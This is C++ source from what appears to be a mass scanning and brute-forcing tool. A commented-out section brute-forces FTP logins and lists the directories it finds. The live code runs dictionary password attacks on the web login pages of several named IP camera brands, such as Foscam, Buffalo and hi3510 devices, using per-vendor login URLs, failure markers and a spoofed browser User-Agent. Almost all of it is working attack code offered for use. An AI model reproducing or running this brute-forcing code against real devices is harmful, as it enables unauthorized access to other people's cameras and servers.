// ZeroMemory(recvBuff, sizeof(recvBuff));
// Sleep(30000);
// break;
// }
// else if( (strstr(recvBuff, "220 ") != NULL || loginFailedFlag == 1 || strstr(recvBuff, "503") != NULL || strstr(recvBuff, "server ready") != NULL ))
// {
// strcpy(request, "USER ");
// if(strlen(loginLst[i]) != 0) strcat(request, loginLst[i]);
// else
// {
// loginFailedFlag = 1;
// break;
// };
// strcat(request, "\r\n");
// if(send(sockFTP, request, strlen(request), 0) != SOCKET_ERROR)
// {
// if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request));
// Activity += strlen(request);
// ZeroMemory(request, sizeof(request));
// }
// else
// {
// stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port));
// };
// }
// else if(strstr(recvBuff, "530") != NULL
// || strstr(recvBuff, "Login incorrect") != NULL
// || strstri(recvBuff, "500 oops") != NULL
// )
// {
// loginFailedFlag = 1;
// break;
// }
// else if(strstr(recvBuff, "331") != NULL)
// {
// if(strstr(recvBuff, "Non-anonymous sessions must use encryption") != NULL
// || strstr(recvBuff, "Rejected--secure connection required") != NULL
// )
// {
// stt->doEmition_BARedData("FTP server (" + QString(ip) + ") appears to require SSL for specified user: " + QString(loginLst[i]));
// strcpy(lps.login, "UNKNOWN");
// return lps;
// }
// else if(strstri(recvBuff, "permission denied") == NULL)
// {
// strcpy(request, "PASS ");
// if(strlen(passLst[j]) != 0) strcat(request, passLst[j]);
// else
// {
// loginFailedFlag = 1;
// break;
// };
// strcat(request, "\r\n");
// if(send(sockFTP, request, strlen(request), 0) != SOCKET_ERROR)
// {
// if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request));
// Activity += strlen(request);
// ZeroMemory(request, sizeof(request));
// if(BALogSwitched) stt->doEmitionBAData("Probing FTP: " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" + QString::number((passCounter/(double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
// ++passCounter;
// }
// else
// {
// stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port));
// };
// }
// else
// {
// breakPassLoop = 1;
// stt->doEmition_BARedData("Permission denied for login - " + QString(ip) + ":" + QString::number(port) + "; login: " + QString(loginLst[i]));
// break;
// };
// }
// else if(strstr(recvBuff, "230") != NULL)
// {
// char pass[128] = {0};
// strcpy(pass, ip);
// strcat(pass, " - FTP Password found: ");
// strcat(pass, loginLst[i]);
// strcat(pass, ":");
// strcat(pass, passLst[j]);
// char recvBuff2[2048] = {0};
// if(send(sockFTP, "PASV\r\n", 6, 0) != SOCKET_ERROR)
// {
// int x = 1, xx = 0;
// while(x != 0)
// {
// ZeroMemory(recvBuff, sizeof(recvBuff));
// x = recvWT(sockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 5, &bTO);
// xx += x;
// if(xx < 1536) strncat(recvBuff2, recvBuff, x);
// else break;
// };
// if(strstri(recvBuff2, "unknown command") != NULL || strstri(recvBuff2, "invalid command") != NULL)
// {
// stt->doEmitionYellowFoundData("[-] PASV failed. Router detected?");
// strcpy(lps.login, loginLst[i]);
// strcpy(lps.pass, passLst[j]);
// strcpy(lps.other, "ROUTER");
// return lps;
// };
// char *ptr0 = strstr(recvBuff2, "227 ");
// if( ptr0 != NULL )
// {
// if(strstr(ptr0, "(") != NULL)
// {
// char pasvData[32] = {0};
// char *ptr1 = strstr(ptr0, "(");
// char *ptr2 = strstr(ptr0, ")");
// int sz = ptr2 - ptr1 - 1;
// strncpy(pasvData, ptr1 + 1, sz);
// char *ptr3 = strstr(pasvData, ",");
// ptr3 = strstr(ptr3 + 1, ",");
// ptr3 = strstr(ptr3 + 1, ",");
// ptr3 = strstr(ptr3 + 1, ",");
// if(ptr3 != NULL)
// {
// char *ptrP2 = strstr(ptr3 + 1, ",");
// char p1c[8] = {0};
// sz = ptrP2 - ptr3 - 1;
// strncpy(p1c, ptr3 + 1, sz);
// int p1 = atoi(p1c);
// int p2 = atoi(ptrP2 + 1);
// port = p1 * 256 + p2;
// sockAddr.sin_port = htons(port);
// connectionResult = connect(newSockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
// send(sockFTP, "LIST\r\n", 6, 0);
// ZeroMemory(recvBuff, sizeof(recvBuff));
// int x = recvWT(newSockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 3, &bTO);
// if(x <= 0 || strstr(recvBuff, "unknown command") != NULL)
// {
// send(sockFTP, "MLSD\r\n", 6, 0);
// ZeroMemory(recvBuff, sizeof(recvBuff));
// x = recvWT(newSockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 3, &bTO);
// if(x <= 0 || strstr(recvBuff, "unknown command") != NULL)
// {
// stt->doEmition_BAGreenData("[?] " + QString(pass) + " [MLSD&LIST failed or server closed connection.]");
// CSSOCKET(newSockFTP);
// closedSocket = 1;
// strcpy(lps.login, "UNKNOWN");
// return lps;
// }
// else {
// stt->doEmition_BAGreenData("[+] " + QString(pass) + " [MLSD succeeded]");
// ps->directoryCount = _countFTPDirectories(recvBuff);
// };
// }
// else
// {
// stt->doEmition_BAGreenData("[+] " + QString(pass) + " [LIST succeeded]");
// ps->directoryCount = _countFTPDirectories(recvBuff);
// };
// CSSOCKET(newSockFTP);
// }
// else
// {
// stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV failed]");
// };
// }
// else
// {
// stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV TO] Failed!");
// };
// }
// else
// {
// stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV TO] Failed!");
// };
// if(xx > 1)
// {
// strcpy(ps->headr, "</a><pre><font color=\"goldenrod\"> (");
// strncat(ps->headr, recvBuff, 256);
// strcat(ps->headr, ")</font></pre>");
// };
// strcpy(lps.login, loginLst[i]);
// strcpy(lps.pass, passLst[j]);
// return lps;
// }
// else
// {
// stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port));
// strcpy(lps.login, loginLst[i]);
// strcpy(lps.pass, passLst[j]);
// return lps;
// };
// };
// };
// closedSocket = 1;
// ZeroMemory(recvBuff, sizeof(recvBuff));
// }
// else
// {
// int WSAerr;
// if(connectionResult == -1) WSAerr = WSAGetLastError();
// else WSAerr = WSAETIMEDOUT;
// if(gThreads > 1
// && WSAerr != WSAETIMEDOUT/*Timeout*/
// && WSAerr != 0)
// {
// stt->doEmitionRedFoundData("[FTPBrute] Cannot connect to " + QString(ip) + " " + QString(std::to_string(WSAerr).c_str()));
// };
// strcpy(lps.login, "UNKNOWN");
// return lps;
// };
// Sleep(100);
// if(breakPassLoop)
// {
// breakPassLoop = false;
// break;
// };
// };
// };
// strcpy(lps.login, "UNKNOWN");
// return lps;
//lopaStr _FTPLobby(char *ip, int port, PathStr *ps)
// while(BrutingThrds >= gMaxBrutingThreads) Sleep(700);
// lopaStr lps;
// ZeroMemory(lps.login, sizeof(lps.login));
// ZeroMemory(lps.pass, sizeof(lps.pass));
// ZeroMemory(lps.other, sizeof(lps.other));
// BruteUtils::BConInc();
// lps = _FTPBrute(ip, port, ps);
// BruteUtils::BConDec();
// return lps;
int _webLoginSeq(char *request, char *login, char *pass, char *ip, int port, int passCounter, char *type, std::vector<char*> negVector)
char recvBuff[256] = {0};
char recvBuff2[4096] = {0};
SOCKET sock;
sockaddr_in sockAddr;
int bTO;
sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons(port);
HOSTENT *host;
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip);
else if(host=gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
return -1;
if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip);
else if(host=gethostbyname(ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
return -1;
int cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
int cErrCode = WSAGetLastError();
while(cErrCode == WSAENOTSOCK)
cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
cErrCode = WSAGetLastError();
if(gDebugMode) stt->doEmitionDebugFoundData("[" + QString(type) + "][ENOTSOCK] [" + QString(ip) + ":" + QString::number(port) + "]");
if(cCode != SOCKET_ERROR)
Activity += strlen(request);
if(send(sock, request, strlen(request), 0) == SOCKET_ERROR)
stt->doEmitionRedFoundData("[" + QString(type) + "] Send error! [" + QString(ip) + "]");
return 0;
if(MapWidgetOpened) stt->doEmitionAddOutData(QString(request));
int x = 1;
int xx = 0;
ZeroMemory(recvBuff2, sizeof(recvBuff2));
while(xx < 3072)
ZeroMemory(recvBuff, sizeof(recvBuff));
x = recvWT(sock, recvBuff, sizeof(recvBuff), gTimeOut + 2, &bTO);
if(x <= 0) break;
strncat(recvBuff2, recvBuff, x);
xx += x;
Activity += x;
if(BALogSwitched) stt->doEmitionBAData("Checked " + QString(type) + ": " + QString(ip) + ":" + QString::number(port) + "; login/pass: "+ QString(login) + ":" + QString(pass) + "; - Progress: (" + QString::number((passCounter/(double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff2));
if(strlen(recvBuff2) > 0) {
bool result = true;
for(int i = 0; i < negVector.size(); ++i)
if(strstri(recvBuff2, negVector[i]) != NULL)
result = false;
return 1;
return 0;
lopaStr _IPCameraBrute(char *ip, int port, char *SPEC)
lopaStr lps;
ZeroMemory(lps.login, sizeof(lps.login));
ZeroMemory(lps.pass, sizeof(lps.pass));
ZeroMemory(lps.other, sizeof(lps.other));
char login[128] = {0};
char pass[128] = {0};
char request[1024] = {0};
int passCounter = 1;
std::vector<char*> negVector;
if(strcmp(SPEC, "IPC") == 0)
else if(strcmp(SPEC, "GEO") == 0)
negVector.push_back("Access denied");
else if(strcmp(SPEC, "EasyCam") == 0)
negVector.push_back("Set-Cookie: usrLevel=-1;path=/");
else if(strcmp(SPEC, "Foscam") == 0)
else if(strcmp(SPEC, "AVIOSYS") == 0)
negVector.push_back("Password Error");
else if(strcmp(SPEC, "BUFFALO") == 0)
negVector.push_back("403 Forbidden");
else if(strcmp(SPEC, "DVS") == 0)
else if(strcmp(SPEC, "IPCAM") == 0)
negVector.push_back("var check=\"0\"");
negVector.push_back("var authLevel =\"0\";");
else if(strcmp(SPEC, "IEORFOREFOX") == 0)
negVector.push_back("Имя или пароль неверные!");
negVector.push_back("HTTP/1.0 302 Found");
stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!");
strcpy(lps.login, "UNKNOWN");
return lps;
for(int i = 0; i < MaxLogin; i++)
if(globalScanFlag == false) break;
if(strcmp(loginLst[i], " ") == 0) continue;
ZeroMemory(login, sizeof(login));
strcpy(login, loginLst[i]);
for(int j = 0; j < MaxPass; j++)
if(globalScanFlag == false) break;
if(strcmp(passLst[j], " ") == 0) continue;
ZeroMemory(pass, sizeof(pass));
strcpy(pass, passLst[j]);
ZeroMemory(request, sizeof(request));
if(strcmp(SPEC, "IPC") == 0)
strcpy(request, "GET /login.xml?user=");
strcat(request, login);
strcat(request, "&usr=");
strcat(request, login);
strcat(request, "&password=");
strcat(request, pass);
strcat(request, "&pwd=");
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
else if(strcmp(SPEC, "GEO") == 0)
strcpy(request, "GET /Login.cgi?username=");
strcat(request, login);
strcat(request, "&password=");
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
else if(strcmp(SPEC, "EasyCam") == 0)
strcpy(request, "GET /login.xml?user=");
strcat(request, login);
strcat(request, "&usr=");
strcat(request, login);
strcat(request, "&password=");
strcat(request, pass);
strcat(request, "&pwd=");
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
else if(strcmp(SPEC, "Foscam") == 0)
strcpy(request, "GET /cgi-bin/CGIProxy.fcgi?usr=");
strcat(request, login);
strcat(request, "&pwd=");
strcat(request, pass);
strcat(request, "&cmd=logIn&usrName=");
strcat(request, login);
strcat(request, "&pwd=");
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
else if(strcmp(SPEC, "AVIOSYS") == 0)
strcpy(request, "GET /check_user.html?UserName=");
strcat(request, login);
strcat(request, "&PassWord=");
strcat(request, pass);
strcat(request, " HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
else if(strcmp(SPEC, "BUFFALO") == 0)
strcpy(request, "POST /rpc/login HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
int loginLength = strlen(login);
int passLength = strlen(pass);
int sz = loginLength + passLength + strlen("user=&password=");
char *passString = new char[sz + 1];
ZeroMemory(passString, sizeof(passString));
strcpy(passString, "user=");
strcat(passString, login);
strcat(passString, "&password=");
strcat(passString, pass);
strcat(request, "\r\nContent-Length: ");
char tempBuff[16] = {0};
sprintf(tempBuff, "%d", sz);
strcat(request, tempBuff);
strcat(request, "\r\n\r\n");
strcat(request, passString);
delete []passString;
else if(strcmp(SPEC, "DVS") == 0)
strcpy(request, "POST /login HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
int loginLength = strlen(login);
int passLength = strlen(pass);
int sz = loginLength + passLength + strlen("langs=en&user=&password=&submit=+Login+");
char *passString = new char[sz + 1];
ZeroMemory(passString, sizeof(passString));
strcpy(passString, "langs=en&user=");
strcat(passString, login);
strcat(passString, "&password=");
strcat(passString, pass);
strcat(passString, "&submit=+Login+");
strcat(request, "\r\nContent-Length: ");
char tempBuff[16] = {0};
sprintf(tempBuff, "%d", sz);
strcat(request, tempBuff);
strcat(request, "\r\n\r\n");
strcat(request, passString);
delete []passString;
else if(strcmp(SPEC, "IPCAM") == 0)
strcpy(request, "GET /cgi-bin/hi3510/checkuser.cgi?&-name=");
strcat(request, login);
strcat(request, "&-passwd=");
strcat(request, pass);
strcat(request, "&-time=1416767330831 HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: close\r\n\r\n");
else if(strcmp(SPEC, "IEORFOREFOX") == 0)
strcpy(request, "POST /logincheck.rsp?type=1 HTTP/1.1\r\nHost: ");
strcat(request, ip);
if(port != 80){
strcat(request, ":");
char tbuff[16] = {0};
sprintf(tbuff, "%d", port);
strcat(request, tbuff);
strcat(request, "\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv: Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: en-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nConnection: keep-alive");
int loginLength = strlen(login);
int passLength = strlen(pass);
int sz = loginLength + passLength + strlen("username=&userpwd=");
char *passString = new char[sz + 1];
ZeroMemory(passString, sizeof(passString));
strcpy(passString, "username=");
strcat(passString, login);
strcat(passString, "&userpwd=");
strcat(passString, pass);
strcat(request, "\r\nContent-Length: ");
char tempBuff[16] = {0};
sprintf(tempBuff, "%d", sz);
strcat(request, tempBuff);
strcat(request, "\r\n\r\n");
strcat(request, passString);
delete []passString;
int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector);
if(res == 1)
strcpy(lps.login, loginLst[i]);
strcpy(lps.pass, passLst[j]);
return lps;
else if(res == -1)
strcpy(lps.login, "UNKNOWN");
return lps;
strcpy(lps.login, "UNKNOWN");
return lps;
lopaStr _IPCameraBLobby(char *ip, int port, char *SPEC)
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
lopaStr res = _IPCameraBrute(ip, port, SPEC);
return res;
//int Connector::_ConnectToPort(char *ip, int port, char *hl)
// if(gPingNScan)
// {
// if(_pingMyTarget(ip) == 0)
// {
// return -2;
// };
// };
// std::string buffer;
// int size = 0;
// if(port == 22) size = _SSHLobby(ip, port, &buffer);
// else size = Connector::nConnect(ip, port, &buffer);
// if(size > 0)
// {
// ++Alive;
// ++found;
// stt->doEmitionChangeParsed(QString::number(saved) + "/" + QString::number(found));
// conSTR CSTR;
// CSTR.lowerBuff = new char[size + 1];
// CSTR.size = size;
// memcpy(CSTR.lowerBuff, buffer.c_str(), size);
// memset(CSTR.lowerBuff + size, '\0', 1);
// Lexems lx;
// lx._filler(port, (char *)buffer.c_str(), ip, size, &lx, hl);
// delete []CSTR.lowerBuff;
// CSTR.lowerBuff = NULL;
// };
// return 0;